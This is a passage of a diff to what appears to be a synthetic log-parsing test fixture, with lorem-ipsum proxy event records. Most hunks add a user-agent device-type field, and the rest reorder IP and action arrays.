Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -2422,6 +2453,7 @@ "url.original": "https://internal.example.net/ende/abor.jpg?riameaqu=ame#tesseq", "user.name": "itasp", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -2456,8 +2488,8 @@ "lapar1599.www.lan" ], "related.ip": [ - "10.106.77.138", - "10.193.66.155" + "10.193.66.155", + "10.106.77.138" ], "related.user": [ "iusmodt" @@ -2471,8 +2503,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uteir", "rsa.misc.action": [ - "Allowed", - "Section" + "Section", + "Allowed" ], "rsa.misc.category": "cididu", "rsa.misc.filter": "Utenima", @@ -2498,6 +2530,7 @@ "url.original": "https://example.com/ame/amvolu.txt?equaturv=lamc#mvolupta", "user.name": "iusmodt", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2547,8 +2580,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tec", "rsa.misc.action": [ - "Allowed", - "tatema" + "tatema", + "Allowed" ], "rsa.misc.category": "emullamc", "rsa.misc.filter": "emveleum", @@ -2574,6 +2607,7 @@ "url.original": "https://mail.example.org/uisnostr/reetdol.txt?ugi=niamquis#nisi", "user.name": "mUteni", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -2608,8 +2642,8 @@ "ura675.mail.localdomain" ], "related.ip": [ - "10.131.246.134", - "10.49.242.174" + "10.49.242.174", + "10.131.246.134" ], "related.user": [ "umdolo" @@ -2650,6 +2684,7 @@ "url.original": "https://api.example.com/radipis/cive.gif?orumSec=nisiuta#stiaecon", "user.name": "umdolo", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2684,8 +2719,8 @@ "iamea478.www5.host" ], "related.ip": [ - "10.142.120.198", - "10.166.10.42" + "10.166.10.42", + "10.142.120.198" ], "related.user": [ "olori" @@ -2726,6 +2761,7 @@ "url.original": "https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto", "user.name": "olori", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2802,6 +2838,7 @@ "url.original": "https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS", "user.name": "etur", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -2851,8 +2888,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ese", "rsa.misc.action": [ - "Allowed", - "litanim" + "litanim", + "Allowed" ], "rsa.misc.category": "idata", "rsa.misc.filter": "urerepre", @@ -2878,6 +2915,7 @@ "url.original": "https://example.net/snulap/enimadm.html?writte=sitvo#ine", "user.name": "isau", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2912,8 +2950,8 @@ "orp5697.www.invalid" ], "related.ip": [ - "10.55.81.14", - "10.243.6.41" + "10.243.6.41", + "10.55.81.14" ], "related.user": [ "eiusmo" @@ -2954,6 +2992,7 @@ "url.original": "https://internal.example.org/etcon/onsequu.gif?Bonoru=madminim#ents", "user.name": "eiusmo", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3003,8 +3042,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "lit", "rsa.misc.action": [ - "Blocked", - "quu" + "quu", + "Blocked" ], "rsa.misc.category": "oluptate", "rsa.misc.filter": "exercita", @@ -3030,6 +3069,7 @@ "url.original": "https://www.example.org/rur/itse.gif?pisciv=fugiatqu#seos", "user.name": "rios", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3064,8 +3104,8 @@ "fficia2304.www5.home" ], "related.ip": [ - "10.20.124.138", - "10.158.18.51" + "10.158.18.51", + "10.20.124.138" ], "related.user": [ "CSe" @@ -3106,6 +3146,7 @@ "url.original": "https://mail.example.com/qui/equeporr.jpg?itsedd=texpli#liquipex", "user.name": "CSe", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3140,8 +3181,8 @@ "mquisnos7453.home" ], "related.ip": [ - "10.134.128.27", - "10.118.177.136" + "10.118.177.136", + "10.134.128.27" ], "related.user": [ "Utenima" @@ -3155,8 +3196,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "voluptas", "rsa.misc.action": [ - "olor", - "Allowed" + "Allowed", + "olor" ], "rsa.misc.category": "ataevita", "rsa.misc.filter": "nderi", @@ -3182,6 +3223,7 @@ "url.original": "https://api.example.net/lup/iumtotam.html?ipitlabo=userror#eacommo", "user.name": "Utenima", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -3216,8 +3258,8 @@ "aquio748.www.localhost" ], "related.ip": [ - "10.68.8.143", - "10.125.120.97" + "10.125.120.97", + "10.68.8.143" ], "related.user": [ "reet" @@ -3258,6 +3300,7 @@ "url.original": "https://example.org/onproide/uamnih.htm?tatisetq=uidolo#umdolore", "user.name": "reet", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3292,8 +3335,8 @@ "remagnam796.mail.corp" ], "related.ip": [ - "10.143.0.78", - "10.137.164.122" + "10.137.164.122", + "10.143.0.78" ], "related.user": [ "orissus" @@ -3307,8 +3350,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "etdol", "rsa.misc.action": [ - "Blocked", - "mwrit" + "mwrit", + "Blocked" ], "rsa.misc.category": "inim", "rsa.misc.filter": "aturQu", @@ -3334,6 +3377,7 @@ "url.original": "https://www5.example.org/obeataev/umf.htm?moll=quaeabil#emip", "user.name": "orissus", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -3368,8 +3412,8 @@ "etdolore4227.internal.corp" ], "related.ip": [ - "10.30.87.51", - "10.156.177.53" + "10.156.177.53", + "10.30.87.51" ], "related.user": [ "psaquaea" @@ -3410,6 +3454,7 @@ "url.original": "https://mail.example.org/consequa/eaqueip.gif?aevitaed=byCic#leumiur", "user.name": "psaquaea", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3444,8 +3489,8 @@ "rors1935.api.domain" ], "related.ip": [ - "10.83.138.34", - "10.111.249.184" + "10.111.249.184", + "10.83.138.34" ], "related.user": [ "dentsunt" @@ -3486,6 +3531,7 @@ "url.original": "https://example.org/tmo/onofdeF.txt?oremip=its#uptasnul", "user.name": "dentsunt", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -3562,6 +3608,7 @@ "url.original": "https://mail.example.com/orsitvol/ntor.htm?itqu=minimav#smodtem", "user.name": "taliq", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -3638,6 +3685,7 @@ "url.original": "https://internal.example.org/rumexe/xerci.gif?olor=quiav#gna", "user.name": "lamcolab", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3670,8 +3718,8 @@ "tecto708.www5.example" ], "related.ip": [ - "10.22.122.43", - "10.100.143.226" + "10.100.143.226", + "10.22.122.43" ], "related.user": [ "ute" @@ -3685,8 +3733,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ento", "rsa.misc.action": [ - "Blocked", - "Bonoru" + "Bonoru", + "Blocked" ], "rsa.misc.category": "luptasnu", "rsa.misc.filter": "quamni", @@ -3712,6 +3760,7 @@ "url.original": "https://example.org/tvolu/dutper.html?nbyCicer=scipit#equuntu", "user.name": "ute", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3746,8 +3795,8 @@ "ine3181.www.invalid" ], "related.ip": [ - "10.121.9.5", - "10.119.53.68" + "10.119.53.68", + "10.121.9.5" ], "related.user": [ "ssec" @@ -3788,6 +3837,7 @@ "url.original": "https://www.example.com/uiavo/uisaut.htm?paq=uianon#nul", "user.name": "ssec", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -3864,6 +3914,7 @@ "url.original": "https://mail.example.com/uasiarch/Malor.jpg?iinea=snos#upt", "user.name": "sci", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3896,8 +3947,8 @@ "pitl6126.www.localdomain" ], "related.ip": [ - "10.243.182.229", - "10.229.102.140" + "10.229.102.140", + "10.243.182.229" ], "related.user": [ "duntut" @@ -3911,8 +3962,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "epor", "rsa.misc.action": [ - "etquasia", - "Allowed" + "Allowed", + "etquasia" ], "rsa.misc.category": "iaturE", "rsa.misc.filter": "rep", @@ -3938,6 +3989,7 @@ "url.original": "https://api.example.org/ntiumt/sumquia.jpg?lam=asnu#com", "user.name": "duntut", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -4010,6 +4062,7 @@ "url.original": "https://example.com/itsedqu/paq.jpg?hilmol=oluptate#todi", "user.name": "picia", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4086,6 +4139,7 @@ "url.original": "https://api.example.org/remeum/etur.html?Quisa=quiav#ctionofd", "user.name": "onsec", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -4120,8 +4174,8 @@ "cia5990.api.localdomain" ], "related.ip": [ - "10.89.41.97", - "10.91.2.225" + "10.91.2.225", + "10.89.41.97" ], "related.user": [ "tem" @@ -4135,8 +4189,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "iuntN", "rsa.misc.action": [ - "nim", - "Allowed" + "Allowed", + "nim" ], "rsa.misc.category": "etco", "rsa.misc.filter": "autodita", @@ -4162,6 +4216,7 @@ "url.original": "https://internal.example.org/ree/itten.gif?rsp=imipsa#nostrum", "user.name": "tem", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -4196,8 +4251,8 @@ "riatu2467.lan" ], "related.ip": [ - "10.7.18.226", - "10.221.20.165" + "10.221.20.165", + "10.7.18.226" ], "related.user": [ "uasiarch" @@ -4238,6 +4293,7 @@ "url.original": "https://www.example.net/ritquiin/reseo.jpg?ari=umtot#onemulla", "user.name": "uasiarch", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -4314,6 +4370,7 @@ "url.original": "https://mail.example.com/dexe/nemul.jpg?yCicero=inimave#eavolupt", "user.name": "inrepreh", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -4390,6 +4447,7 @@ "url.original": "https://mail.example.org/caecat/uel.html?enim=umq#sistena", "user.name": "olup", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4422,8 +4480,8 @@ "imveni193.www5.host" ], "related.ip": [ - "10.55.38.153", - "10.112.190.154" + "10.112.190.154", + "10.55.38.153" ], "related.user": [ "oremeu" @@ -4437,8 +4495,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tin", "rsa.misc.action": [ - "Allowed", - "urau" + "urau", + "Allowed" ], "rsa.misc.category": "isiut", "rsa.misc.filter": "cons", @@ -4464,6 +4522,7 @@ "url.original": "https://mail.example.com/runtmoll/busBon.txt?ionev=vitaedi#rna", "user.name": "oremeu", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -4540,6 +4599,7 @@ "url.original": "https://api.example.com/lits/tvolu.jpg?squir=gnaaliq#quam", "user.name": "tsedquia", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4574,8 +4634,8 @@ "remips1499.www.local" ], "related.ip": [ - "10.60.52.219", - "10.252.164.230" + "10.252.164.230", + "10.60.52.219" ], "related.user": [ "gnamali" @@ -4589,8 +4649,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rroq", "rsa.misc.action": [ - "Blocked", - "fdeFin" + "fdeFin", + "Blocked" ], "rsa.misc.category": "diduntut", "rsa.misc.filter": "ano", @@ -4616,6 +4676,7 @@ "url.original": "https://mail.example.net/loremi/queporro.jpg?ade=nihilmol#nder", "user.name": "gnamali", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -4646,8 +4707,8 @@ "mdoloree96.domain" ], "related.ip": [ - "10.187.16.73", - "10.122.102.156" + "10.122.102.156", + "10.187.16.73" ], "related.user": [ "emoen" @@ -4661,8 +4722,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "dipisc", "rsa.misc.action": [ - "turad", - "Allowed" + "Allowed", + "turad" ], "rsa.misc.category": "ulpaquio", "rsa.misc.filter": "ngelits", @@ -4688,6 +4749,7 @@ "url.original": "https://api.example.com/nge/psum.gif?exerci=isnostru#iad", "user.name": "emoen", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4722,8 +4784,8 @@ "iatnulap7662.internal.local" ], "related.ip": [ - "10.248.108.55", - "10.120.215.174" + "10.120.215.174", + "10.248.108.55" ], "related.user": [ "prehend" @@ -4737,8 +4799,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rema", "rsa.misc.action": [ - "uatDu", - "Allowed" + "Allowed", + "uatDu" ], "rsa.misc.category": "ent", "rsa.misc.filter": "iscivel", @@ -4764,6 +4826,7 @@ "url.original": "https://internal.example.org/ddoeiusm/apa.txt?uptatemU=rem#onorumet", "user.name": "prehend", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4811,8 +4874,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "modit", "rsa.misc.action": [ - "uteiru", - "Allowed" + "Allowed", + "uteiru" ], "rsa.misc.category": "qua", "rsa.misc.filter": "saute", @@ -4838,6 +4901,7 @@ "url.original": "https://www5.example.net/yCice/uinesci.htm?taevitae=dminimv#quam", "user.name": "abo", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4872,8 +4936,8 @@ "onorumet4871.lan" ], "related.ip": [ - "10.129.66.196", - "10.7.152.238" + "10.7.152.238", + "10.129.66.196" ], "related.user": [ "equamn" @@ -4887,8 +4951,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "vento", "rsa.misc.action": [ - "reh", - "Blocked" + "Blocked", + "reh" ], "rsa.misc.category": "atev", "rsa.misc.filter": "umq", @@ -4914,6 +4978,7 @@ "url.original": "https://api.example.com/itinvolu/adeserun.txt?tinv=Utenima#nse", "user.name": "equamn", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -4990,6 +5055,7 @@ "url.original": "https://www.example.org/sci/isquames.gif?tlabor=itecto#loreeuf", "user.name": "evelite", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5066,6 +5132,7 @@ "url.original": "https://mail.example.org/umdolo/nimv.htm?equunt=tutla#usmod", "user.name": "eavolupt", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -5142,6 +5209,7 @@ "url.original": "https://mail.example.net/tvol/ostru.htm?oei=iquipex#byCice", "user.name": "Nequepo", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -5191,8 +5259,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "plicab", "rsa.misc.action": [ - "umq", - "Blocked" + "Blocked", + "umq" ], "rsa.misc.category": "eruntmol", "rsa.misc.filter": "labore", @@ -5218,6 +5286,7 @@ "url.original": "https://mail.example.org/pariatur/cita.html?equuntur=rve#atemacc", "user.name": "edict", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -5252,8 +5321,8 @@ "aturExc7343.invalid" ], "related.ip": [ - "10.146.69.38", - "10.55.192.102" + "10.55.192.102", + "10.146.69.38" ], "related.user": [ "quia" @@ -5294,6 +5363,7 @@ "url.original": "https://example.org/aturE/aaliqu.gif?nvol=doloreeu#elillumq", "user.name": "quia", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5328,8 +5398,8 @@ "olo7317.www5.localhost" ], "related.ip": [ - "10.124.177.226", - "10.249.1.143" + "10.249.1.143", + "10.124.177.226" ], "related.user": [ "isciveli" @@ -5343,8 +5413,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "Utenim", "rsa.misc.action": [ - "Allowed", - "onevo" + "onevo", + "Allowed" ], "rsa.misc.category": "tdolore", "rsa.misc.filter": "ptasn", @@ -5370,6 +5440,7 @@ "url.original": "https://internal.example.org/olorin/orisnisi.gif?eritquii=atevelit#dese", "user.name": "isciveli", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -5404,8 +5475,8 @@ "uiin1342.mail.invalid" ], "related.ip": [ - "10.167.176.220", - "10.146.228.249" + "10.146.228.249", + "10.167.176.220" ], "related.user": [ "estla" @@ -5446,6 +5517,7 @@ "url.original": "https://example.org/vel/preh.html?sequamni=edutpers#deo", "user.name": "estla", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5480,8 +5552,8 @@ "agna5654.www.corp" ], "related.ip": [ - "10.200.74.101", - "10.203.47.23" + "10.203.47.23", + "10.200.74.101" ], "related.user": [ "litesse" @@ -5495,8 +5567,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "nde", "rsa.misc.action": [ - "iqu", - "Allowed" + "Allowed", + "iqu" ], "rsa.misc.category": "ametco", "rsa.misc.filter": "ntincul", @@ -5522,6 +5594,7 @@ "url.original": "https://example.com/nonproi/dolor.jpg?molli=oeiusm#aUtenim", "user.name": "litesse", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5556,8 +5629,8 @@ "ites5711.internal.host" ], "related.ip": [ - "10.24.23.209", - "10.162.78.48" + "10.162.78.48", + "10.24.23.209" ], 